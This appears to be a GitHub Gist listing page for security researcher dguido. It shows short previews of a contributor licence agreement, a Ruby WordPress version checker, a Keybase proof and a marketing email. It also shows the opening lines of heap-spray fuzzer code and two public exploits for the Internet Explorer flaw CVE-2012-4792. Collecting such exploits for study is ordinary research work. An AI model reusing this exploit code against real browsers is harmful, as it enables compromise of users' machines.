Skip to content

Instantly share code, notes, and snippets.

@dguido
dguido / tob_icla.txt
Last active June 20, 2018 23:35
Trail of Bits Individual Contributor License Agreement
Trail of Bits Individual Contributor License Agreement
Thank you for your interest in software from Trail of Bits ("TOB"). In order to
clarify the intellectual property license granted with Contributions from any person
or entity, the TOB must have a Contributor License Agreement ("Agreement") on file
that has been signed by each Contributor, indicating agreement to the license terms
below. This license is for your protection as a Contributor as well as the
protection of TOB and its users; it does not change your rights to use your own
Contributions for any other purpose.
@dguido
dguido / wp_version.rb
Created April 23, 2015 15:10
My first Ruby script
#!/usr/bin/ruby
require 'rubygems'
require 'nokogiri'
require 'open-uri'
require 'uri'
# Chrome on Win7
USERAGENT= "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0"

Keybase proof

I hereby claim:

  • I am dguido on github.
  • I am dguido (https://keybase.io/dguido) on keybase.
  • I have a public key whose fingerprint is 9339 F792 8B51 C11D E67D 7247 EA8F 0B5C D09A 6DEC

To claim this, I am signing this object:

@dguido
dguido / shady_verizon.txt
Created June 23, 2013 21:26
Unsolicited e-mail, Subject: "Additional Resource for isis.poly.edu"
Hello Dan,
My name is Parker and I'm helping Verizon Enterprise Solutions announce
the 2013 Data Breach Investigations Report. Have you heard about it or
perhaps already read it?
The report features many new insights and contributors like US-CERT and
the Secret Service. I thought it would be of interest to the NYU Poly
students and faculty much like the articles I found on your "Resources"
page at http://www.isis.poly.edu/resources
@dguido
dguido / ref_fuzz5.js
Created March 7, 2013 01:05
Heap spray code snippet from lcamtuf's ref_fuzz5 JavaScript DOM fuzzer
function heap_spray() {
if (MEGS == 0 || R(2) == 0) return;
if (!spray_str) {
var spray_str = "ABCDABCD";
for (var i=0;i<21;i++) spray_str += spray_str; /* 16M */
}
window.name = Math.random() + spray_str + Math.random();
@dguido
dguido / CVE-2012-4792-peter.js
Created March 7, 2013 01:03
Exploit for CVE-2012-4792 as improved by Peter Vreugdenhil
e_form = document.getElementById("formelm");
e_div = document.getElementById("divelm");
animvalues = "\u4141\u4141"
while(animvalues.length < 0xDC) {
animvalues += animvalues
}
for(i = 0; i < 21; i++) {
animvalues += ";cyan";
}
for(i =0; i < 20; i++) {
@dguido
dguido / CVE-2012-4792-elderwood.js
Last active December 14, 2015 14:59
Exploit for CVE-2012-4792 as developed by Elderwood
var e0 = null;
var e1 = null;
var e2 = null;
var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}